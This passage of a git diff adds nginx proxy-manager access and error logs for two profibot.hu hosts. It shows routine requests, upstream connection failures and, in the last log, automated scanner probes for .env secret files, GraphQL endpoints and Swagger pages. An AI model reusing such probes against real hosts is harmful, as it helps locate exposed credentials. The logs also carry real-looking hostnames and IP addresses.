"http://fimer.profibot.hu/" +[24/Jan/2026:18:25:13 +0000] - 502 502 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.2.117] [Length 556] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[24/Jan/2026:18:25:13 +0000] - 502 502 - GET http fimer.profibot.hu "/v1/orion/product-metadata" [Client 37.76.2.117] [Length 556] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[24/Jan/2026:18:25:21 +0000] - 502 502 - GET http fimer.profibot.hu "/v1/orion/product-metadata" [Client 37.76.2.117] [Length 556] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[24/Jan/2026:18:25:21 +0000] - 502 502 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.2.117] [Length 556] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[24/Jan/2026:18:27:23 +0000] - 502 502 - GET http fimer.profibot.hu "/v1/orion/product-metadata" [Client 37.76.2.117] [Length 556] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[24/Jan/2026:18:27:23 +0000] - 502 502 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.2.117] [Length 556] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[26/Jan/2026:07:30:04 +0000] - 502 502 - GET http fimer.profibot.hu "/" [Client 84.1.26.27] [Length 556] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[26/Jan/2026:07:30:07 +0000] - 502 502 - GET http fimer.profibot.hu "/favicon.ico" [Client 84.1.26.27] [Length 556] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[28/Jan/2026:23:34:00 +0000] - 502 502 - GET http fimer.profibot.hu "/v1/orion/product-metadata" [Client 37.76.10.148] [Length 556] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[28/Jan/2026:23:34:00 +0000] - 502 502 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.10.148] [Length 556] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[28/Jan/2026:23:34:00 +0000] - 502 502 - GET http fimer.profibot.hu "/favicon.ico" [Client 37.76.10.148] [Length 556] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[28/Jan/2026:23:34:08 +0000] - 502 502 - GET http fimer.profibot.hu "/v1/orion/product-metadata" [Client 37.76.10.148] [Length 556] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[28/Jan/2026:23:34:08 +0000] - 502 502 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.10.148] [Length 556] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[28/Jan/2026:23:34:16 +0000] - 502 502 - GET http fimer.profibot.hu "/v1/orion/product-metadata" [Client 37.76.10.148] [Length 556] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[28/Jan/2026:23:34:16 +0000] - 502 502 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.10.148] [Length 556] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[28/Jan/2026:23:34:25 +0000] - 502 502 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.10.148] [Length 556] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[28/Jan/2026:23:34:25 +0000] - 502 502 - GET http fimer.profibot.hu "/v1/orion/product-metadata" [Client 37.76.10.148] [Length 556] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[28/Jan/2026:23:37:52 +0000] - 502 502 - GET http fimer.profibot.hu "/" [Client 37.76.10.148] [Length 556] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:37:55 +0000] - 502 502 - GET http fimer.profibot.hu "/favicon.ico" [Client 37.76.10.148] [Length 556] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" diff --git a/proxy-manager/data/logs/proxy-host-7_error.log b/proxy-manager/data/logs/proxy-host-7_error.log new file mode 100755 index 0000000..5ebe08d --- /dev/null +++ b/proxy-manager/data/logs/proxy-host-7_error.log @@ -0,0 +1,45 @@ +2026/01/12 17:56:48 [warn] 233#233: *7752 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/98/0000002982 while reading upstream, client: 37.76.12.170, server: fimer.profibot.hu, request: "GET /index.es6.js?5470dfb553c45ab13d14 HTTP/1.1", upstream: "http://192.168.100.6:80/index.es6.js?5470dfb553c45ab13d14", host: "fimer.profibot.hu", referrer: "http://fimer.profibot.hu/" +2026/01/12 17:56:51 [warn] 233#233: *7764 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/98/0000002983 while reading upstream, client: 37.76.12.170, server: fimer.profibot.hu, request: "GET /v1/orion/domaintypes-metadata/?scope=telemetry HTTP/1.1", upstream: "http://192.168.100.6:80/v1/orion/domaintypes-metadata/?scope=telemetry", host: "fimer.profibot.hu", referrer: "http://fimer.profibot.hu/" +2026/01/12 17:56:53 [warn] 233#233: *7760 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/98/0000002984 while reading upstream, client: 37.76.12.170, server: fimer.profibot.hu, request: "GET /v1/orion/domaintypes-metadata/?scope=telemetry HTTP/1.1", upstream: "http://192.168.100.6:80/v1/orion/domaintypes-metadata/?scope=telemetry", host: "fimer.profibot.hu", referrer: "http://fimer.profibot.hu/" +2026/01/12 17:56:59 [warn] 233#233: *7776 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/98/0000002985 while reading upstream, client: 37.76.12.170, server: fimer.profibot.hu, request: "GET /v1/orion/events?pageSize=1000&pageOffset=0 HTTP/1.1", upstream: "http://192.168.100.6:80/v1/orion/events?pageSize=1000&pageOffset=0", host: "fimer.profibot.hu", referrer: "http://fimer.profibot.hu/" +2026/01/13 05:33:50 [warn] 248#248: *15589 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/70/0000006701 while reading upstream, client: 37.76.13.124, server: fimer.profibot.hu, request: "GET /v1/orion/product-metadata HTTP/1.1", upstream: "http://192.168.100.6:80/v1/orion/product-metadata", host: "fimer.profibot.hu", referrer: "http://fimer.profibot.hu/" +2026/01/13 05:33:51 [warn] 248#248: *15591 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/70/0000006702 while reading upstream, client: 37.76.13.124, server: fimer.profibot.hu, request: "GET /v1/orion/domaintypes-metadata/?scope=telemetry HTTP/1.1", upstream: "http://192.168.100.6:80/v1/orion/domaintypes-metadata/?scope=telemetry", host: "fimer.profibot.hu", referrer: "http://fimer.profibot.hu/" +2026/01/13 08:19:15 [warn] 247#247: *15769 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/70/0000006703 while reading upstream, client: 37.76.15.156, server: fimer.profibot.hu, request: "GET /v1/orion/product-metadata HTTP/1.1", upstream: "http://192.168.100.6:80/v1/orion/product-metadata", host: "fimer.profibot.hu", referrer: "http://fimer.profibot.hu/" +2026/01/13 08:19:21 [warn] 247#247: *15769 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/70/0000006704 while reading upstream, client: 37.76.15.156, server: fimer.profibot.hu, request: "GET /v1/orion/events?pageSize=1000&pageOffset=0 HTTP/1.1", upstream: "http://192.168.100.6:80/v1/orion/events?pageSize=1000&pageOffset=0", host: "fimer.profibot.hu", referrer: "http://fimer.profibot.hu/" +2026/01/14 07:36:00 [warn] 278#278: *34783 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/63/0000015636 while reading upstream, client: 37.76.47.86, server: fimer.profibot.hu, request: "GET /v1/orion/product-metadata HTTP/1.1", upstream: "http://192.168.100.6:80/v1/orion/product-metadata", host: "fimer.profibot.hu", referrer: "http://fimer.profibot.hu/" +2026/01/14 07:36:02 [warn] 278#278: *34796 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/63/0000015637 while reading upstream, client: 37.76.47.86, server: fimer.profibot.hu, request: "GET /v1/orion/domaintypes-metadata/?scope=telemetry HTTP/1.1", upstream: "http://192.168.100.6:80/v1/orion/domaintypes-metadata/?scope=telemetry", host: "fimer.profibot.hu", referrer: "http://fimer.profibot.hu/" +2026/01/14 07:36:07 [warn] 278#278: *34787 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/63/0000015638 while reading upstream, client: 37.76.47.86, server: fimer.profibot.hu, request: "GET /v1/orion/events?pageSize=1000&pageOffset=0 HTTP/1.1", upstream: "http://192.168.100.6:80/v1/orion/events?pageSize=1000&pageOffset=0", host: "fimer.profibot.hu", referrer: "http://fimer.profibot.hu/" +2026/01/14 07:36:13 [warn] 278#278: *34783 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/63/0000015639 while reading upstream, client: 37.76.47.86, server: fimer.profibot.hu, request: "GET /v1/orion/events?pageSize=1000&pageOffset=0 HTTP/1.1", upstream: "http://192.168.100.6:80/v1/orion/events?pageSize=1000&pageOffset=0", host: "fimer.profibot.hu", referrer: "http://fimer.profibot.hu/" +2026/01/15 07:48:13 [warn] 308#308: *123566 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/48/0000059483 while reading upstream, client: 84.1.26.27, server: fimer.profibot.hu, request: "GET /v1/orion/events?pageSize=1000&pageOffset=0 HTTP/1.1", upstream: "http://192.168.100.6:80/v1/orion/events?pageSize=1000&pageOffset=0", host: "fimer.profibot.hu", referrer: "http://fimer.profibot.hu/" +2026/01/15 13:50:17 [warn] 315#315: *126810 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/97/0000060970 while reading upstream, client: 37.76.46.26, server: fimer.profibot.hu, request: "GET /v1/orion/domaintypes-metadata/?scope=telemetry HTTP/1.1", upstream: "http://192.168.100.6:80/v1/orion/domaintypes-metadata/?scope=telemetry", host: "fimer.profibot.hu", referrer: "http://fimer.profibot.hu/" +2026/01/15 13:50:20 [warn] 315#315: *126810 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/97/0000060971 while reading upstream, client: 37.76.46.26, server: fimer.profibot.hu, request: "GET /v1/orion/domaintypes-metadata/?scope=telemetry HTTP/1.1", upstream: "http://192.168.100.6:80/v1/orion/domaintypes-metadata/?scope=telemetry", host: "fimer.profibot.hu", referrer: "http://fimer.profibot.hu/" +2026/01/15 13:50:22 [warn] 315#315: *126810 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/97/0000060972 while reading upstream, client: 37.76.46.26, server: fimer.profibot.hu, request: "GET /v1/orion/events?pageSize=1000&pageOffset=0 HTTP/1.1", upstream: "http://192.168.100.6:80/v1/orion/events?pageSize=1000&pageOffset=0", host: "fimer.profibot.hu", referrer: "http://fimer.profibot.hu/" +2026/01/15 14:25:36 [warn] 314#314: *129375 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/73/0000061737 while reading upstream, client: 37.76.47.56, server: fimer.profibot.hu, request: "GET /v1/orion/events?pageSize=1000&pageOffset=0 HTTP/1.1", upstream: "http://192.168.100.6:80/v1/orion/events?pageSize=1000&pageOffset=0", host: "fimer.profibot.hu", referrer: "http://fimer.profibot.hu/" +2026/01/16 09:52:31 [warn] 337#337: *132727 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/22/0000063224 while reading upstream, client: 37.76.16.110, server: fimer.profibot.hu, request: "GET /v1/orion/domaintypes-metadata/?scope=telemetry HTTP/1.1", upstream: "http://192.168.100.6:80/v1/orion/domaintypes-metadata/?scope=telemetry", host: "fimer.profibot.hu", referrer: "http://fimer.profibot.hu/" +2026/01/16 12:20:51 [warn] 342#342: *133376 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/22/0000063225 while reading upstream, client: 37.76.21.87, server: fimer.profibot.hu, request: "GET /v1/orion/product-metadata HTTP/1.1", upstream: "http://192.168.100.6:80/v1/orion/product-metadata", host: "fimer.profibot.hu", referrer: "http://fimer.profibot.hu/" +2026/01/16 12:20:52 [warn] 342#342: *133383 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/22/0000063226 while reading upstream, client: 37.76.21.87, server: fimer.profibot.hu, request: "GET /v1/orion/domaintypes-metadata/?scope=telemetry HTTP/1.1", upstream: "http://192.168.100.6:80/v1/orion/domaintypes-metadata/?scope=telemetry", host: "fimer.profibot.hu", referrer: "http://fimer.profibot.hu/" +2026/01/22 23:03:43 [error] 280#280: *296 connect() failed (113: No route to host) while connecting to upstream, client: 37.76.47.183, server: fimer.profibot.hu, request: "GET /v1/orion/product HTTP/1.1", upstream: "http://192.168.100.6:80/v1/orion/product", host: "fimer.profibot.hu", referrer: "http://fimer.profibot.hu/" +2026/01/22 23:03:43 [error] 280#280: *294 connect() failed (113: No route to host) while connecting to upstream, client: 37.76.47.183, server: fimer.profibot.hu, request: "GET /v1/orion/product-metadata HTTP/1.1", upstream: "http://192.168.100.6:80/v1/orion/product-metadata", host: "fimer.profibot.hu", referrer: "http://fimer.profibot.hu/" +2026/01/22 23:03:43 [error] 280#280: *298 connect() failed (113: No route to host) while connecting to upstream, client: 37.76.47.183, server: fimer.profibot.hu, request: "GET /favicon.ico HTTP/1.1", upstream: "http://192.168.100.6:80/favicon.ico", host: "fimer.profibot.hu", referrer: "http://fimer.profibot.hu/" +2026/01/24 18:25:05 [error] 368#368: *72670 connect() failed (113: No route to host) while connecting to upstream, client: 37.76.2.117, server: fimer.profibot.hu, request: "GET /v1/orion/product HTTP/1.1", upstream: "http://192.168.100.6:80/v1/orion/product", host: "fimer.profibot.hu", referrer: "http://fimer.profibot.hu/" +2026/01/24 18:25:05 [error] 365#365: *72674 connect() failed (113: No route to host) while connecting to upstream, client: 37.76.2.117, server: fimer.profibot.hu, request: "GET /favicon.ico HTTP/1.1", upstream: "http://192.168.100.6:80/favicon.ico", host: "fimer.profibot.hu", referrer: "http://fimer.profibot.hu/" +2026/01/24 18:25:05 [error] 368#368: *72672 connect() failed (113: No route to host) while connecting to upstream, client: 37.76.2.117, server: fimer.profibot.hu, request: "GET /v1/orion/product-metadata HTTP/1.1", upstream: "http://192.168.100.6:80/v1/orion/product-metadata", host: "fimer.profibot.hu", referrer: "http://fimer.profibot.hu/" +2026/01/24 18:25:13 [error] 365#365: *72674 connect() failed (113: No route to host) while connecting to upstream, client: 37.76.2.117, server: fimer.profibot.hu, request: "GET /v1/orion/product-metadata HTTP/1.1", upstream: "http://192.168.100.6:80/v1/orion/product-metadata", host: "fimer.profibot.hu", referrer: "http://fimer.profibot.hu/" +2026/01/24 18:25:13 [error] 368#368: *72672 connect() failed (113: No route to host) while connecting to upstream, client: 37.76.2.117, server: fimer.profibot.hu, request: "GET /v1/orion/product HTTP/1.1", upstream: "http://192.168.100.6:80/v1/orion/product", host: "fimer.profibot.hu", referrer: "http://fimer.profibot.hu/" +2026/01/24 18:25:21 [error] 365#365: *72674 connect() failed (113: No route to host) while connecting to upstream, client: 37.76.2.117, server: fimer.profibot.hu, request: "GET /v1/orion/product HTTP/1.1", upstream: "http://192.168.100.6:80/v1/orion/product", host: "fimer.profibot.hu", referrer: "http://fimer.profibot.hu/" +2026/01/24 18:25:21 [error] 368#368: *72672 connect() failed (113: No route to host) while connecting to upstream, client: 37.76.2.117, server: fimer.profibot.hu, request: "GET /v1/orion/product-metadata HTTP/1.1", upstream: "http://192.168.100.6:80/v1/orion/product-metadata", host: "fimer.profibot.hu", referrer: "http://fimer.profibot.hu/" +2026/01/24 18:27:23 [error] 365#365: *72682 connect() failed (113: No route to host) while connecting to upstream, client: 37.76.2.117, server: fimer.profibot.hu, request: "GET /v1/orion/product-metadata HTTP/1.1", upstream: "http://192.168.100.6:80/v1/orion/product-metadata", host: "fimer.profibot.hu", referrer: "http://fimer.profibot.hu/" +2026/01/24 18:27:23 [error] 365#365: *72684 connect() failed (113: No route to host) while connecting to upstream, client: 37.76.2.117, server: fimer.profibot.hu, request: "GET /v1/orion/product HTTP/1.1", upstream: "http://192.168.100.6:80/v1/orion/product", host: "fimer.profibot.hu", referrer: "http://fimer.profibot.hu/" +2026/01/26 07:30:04 [error] 231#231: *6922 connect() failed (113: No route to host) while connecting to upstream, client: 84.1.26.27, server: fimer.profibot.hu, request: "GET / HTTP/1.1", upstream: "http://192.168.100.6:80/", host: "fimer.profibot.hu" +2026/01/26 07:30:07 [error] 231#231: *6922 connect() failed (113: No route to host) while connecting to upstream, client: 84.1.26.27, server: fimer.profibot.hu, request: "GET /favicon.ico HTTP/1.1", upstream: "http://192.168.100.6:80/favicon.ico", host: "fimer.profibot.hu", referrer: "http://fimer.profibot.hu/" +2026/01/28 23:34:00 [error] 332#332: *33187 connect() failed (113: No route to host) while connecting to upstream, client: 37.76.10.148, server: fimer.profibot.hu, request: "GET /v1/orion/product-metadata HTTP/1.1", upstream: "http://192.168.100.6:80/v1/orion/product-metadata", host: "fimer.profibot.hu", referrer: "http://fimer.profibot.hu/" +2026/01/28 23:34:00 [error] 333#333: *33186 connect() failed (113: No route to host) while connecting to upstream, client: 37.76.10.148, server: fimer.profibot.hu, request: "GET /v1/orion/product HTTP/1.1", upstream: "http://192.168.100.6:80/v1/orion/product", host: "fimer.profibot.hu", referrer: "http://fimer.profibot.hu/" +2026/01/28 23:34:00 [error] 331#331: *33190 connect() failed (113: No route to host) while connecting to upstream, client: 37.76.10.148, server: fimer.profibot.hu, request: "GET /favicon.ico HTTP/1.1", upstream: "http://192.168.100.6:80/favicon.ico", host: "fimer.profibot.hu", referrer: "http://fimer.profibot.hu/" +2026/01/28 23:34:08 [error] 331#331: *33190 connect() failed (113: No route to host) while connecting to upstream, client: 37.76.10.148, server: fimer.profibot.hu, request: "GET /v1/orion/product-metadata HTTP/1.1", upstream: "http://192.168.100.6:80/v1/orion/product-metadata", host: "fimer.profibot.hu", referrer: "http://fimer.profibot.hu/" +2026/01/28 23:34:08 [error] 333#333: *33186 connect() failed (113: No route to host) while connecting to upstream, client: 37.76.10.148, server: fimer.profibot.hu, request: "GET /v1/orion/product HTTP/1.1", upstream: "http://192.168.100.6:80/v1/orion/product", host: "fimer.profibot.hu", referrer: "http://fimer.profibot.hu/" +2026/01/28 23:34:16 [error] 333#333: *33186 connect() failed (113: No route to host) while connecting to upstream, client: 37.76.10.148, server: fimer.profibot.hu, request: "GET /v1/orion/product-metadata HTTP/1.1", upstream: "http://192.168.100.6:80/v1/orion/product-metadata", host: "fimer.profibot.hu", referrer: "http://fimer.profibot.hu/" +2026/01/28 23:34:16 [error] 331#331: *33190 connect() failed (113: No route to host) while connecting to upstream, client: 37.76.10.148, server: fimer.profibot.hu, request: "GET /v1/orion/product HTTP/1.1", upstream: "http://192.168.100.6:80/v1/orion/product", host: "fimer.profibot.hu", referrer: "http://fimer.profibot.hu/" +2026/01/28 23:34:25 [error] 331#331: *33190 connect() failed (113: No route to host) while connecting to upstream, client: 37.76.10.148, server: fimer.profibot.hu, request: "GET /v1/orion/product-metadata HTTP/1.1", upstream: "http://192.168.100.6:80/v1/orion/product-metadata", host: "fimer.profibot.hu", referrer: "http://fimer.profibot.hu/" +2026/01/28 23:34:25 [error] 333#333: *33186 connect() failed (113: No route to host) while connecting to upstream, client: 37.76.10.148, server: fimer.profibot.hu, request: "GET /v1/orion/product HTTP/1.1", upstream: "http://192.168.100.6:80/v1/orion/product", host: "fimer.profibot.hu", referrer: "http://fimer.profibot.hu/" +2026/01/28 23:37:52 [error] 341#341: *33237 connect() failed (113: No route to host) while connecting to upstream, client: 37.76.10.148, server: fimer.profibot.hu, request: "GET / HTTP/1.1", upstream: "http://192.168.100.6:80/", host: "fimer.profibot.hu" +2026/01/28 23:37:55 [error] 341#341: *33237 connect() failed (113: No route to host) while connecting to upstream, client: 37.76.10.148, server: fimer.profibot.hu, request: "GET /favicon.ico HTTP/1.1", upstream: "http://192.168.100.6:80/favicon.ico", host: "fimer.profibot.hu", referrer: "http://fimer.profibot.hu/" diff --git a/proxy-manager/data/logs/proxy-host-8_access.log b/proxy-manager/data/logs/proxy-host-8_access.log new file mode 100755 index 0000000..5bd68aa --- /dev/null +++ b/proxy-manager/data/logs/proxy-host-8_access.log @@ -0,0 +1,2132 @@ +[19/Jan/2026:23:24:07 +0000] - - 502 - HEAD http code.profibot.hu "/" [Client 195.123.244.84] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0" "-" +[19/Jan/2026:23:24:08 +0000] - - 502 - HEAD https code.profibot.hu "/.env" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to code-server] "Python/3.13 aiohttp/3.11.18" "-" +[19/Jan/2026:23:24:08 +0000] - - 502 - HEAD https code.profibot.hu "/.env.local" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to code-server] "Python/3.13 aiohttp/3.11.18" "-" +[19/Jan/2026:23:24:08 +0000] - - 502 - HEAD https code.profibot.hu "/.env.prod" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to code-server] "Python/3.13 aiohttp/3.11.18" "-" +[19/Jan/2026:23:24:08 +0000] - - 502 - HEAD https code.profibot.hu "/.env.dev" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to code-server] "Python/3.13 aiohttp/3.11.18" "-" +[19/Jan/2026:23:24:12 +0000] - - 502 - GET https code.profibot.hu "/" [Client 154.28.229.6] [Length 556] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36" "-" +[19/Jan/2026:23:24:12 +0000] - - 502 - GET https code.profibot.hu "/" [Client 107.172.195.162] [Length 556] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36" "-" +[19/Jan/2026:23:24:13 +0000] - - 502 - GET https code.profibot.hu "/" [Client 157.245.204.205] [Length 154] [Gzip -] [Sent-to code-server] "-" "-" +[19/Jan/2026:23:24:14 +0000] - - 502 - GET http code.profibot.hu "/" [Client 146.190.103.103] [Length 154] [Gzip -] [Sent-to code-server] "-" "-" +[19/Jan/2026:23:24:15 +0000] - - 502 - GET http code.profibot.hu "/" [Client 146.190.103.103] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:15 +0000] - - 502 - GET https code.profibot.hu "/" [Client 157.245.204.205] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:16 +0000] - - 502 - POST http code.profibot.hu "/graphql" [Client 146.190.103.103] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:16 +0000] - - 502 - POST https code.profibot.hu "/graphql" [Client 157.245.204.205] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:16 +0000] - - 502 - POST http code.profibot.hu "/api" [Client 146.190.103.103] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:17 +0000] - - 502 - POST https code.profibot.hu "/api" [Client 157.245.204.205] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:17 +0000] - - 502 - POST http code.profibot.hu "/api/graphql" [Client 146.190.103.103] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:17 +0000] - - 502 - POST http code.profibot.hu "/graphql/api" [Client 146.190.103.103] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:18 +0000] - - 502 - POST https code.profibot.hu "/api/graphql" [Client 157.245.204.205] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:18 +0000] - - 502 - POST http code.profibot.hu "/api/gql" [Client 146.190.103.103] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:18 +0000] - - 502 - POST https code.profibot.hu "/graphql/api" [Client 157.245.204.205] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:19 +0000] - - 502 - POST https code.profibot.hu "/api/gql" [Client 157.245.204.205] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:19 +0000] - - 502 - GET http code.profibot.hu "/swagger-ui.html" [Client 146.190.103.103] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:20 +0000] - - 502 - GET http code.profibot.hu "/swagger/index.html" [Client 146.190.103.103] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:21 +0000] - - 502 - GET https code.profibot.hu "/swagger-ui.html" [Client 157.245.204.205] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:21 +0000] - - 502 - GET http code.profibot.hu "/swagger/swagger-ui.html" [Client 146.190.103.103] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:22 +0000] - - 502 - GET https code.profibot.hu "/swagger/index.html" [Client 157.245.204.205] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:22 +0000] - - 502 - GET http code.profibot.hu "/webjars/swagger-ui/index.html" [Client 146.190.103.103] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:22 +0000] - - 502 - GET https code.profibot.hu "/" [Client 104.252.191.21] [Length 556] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; 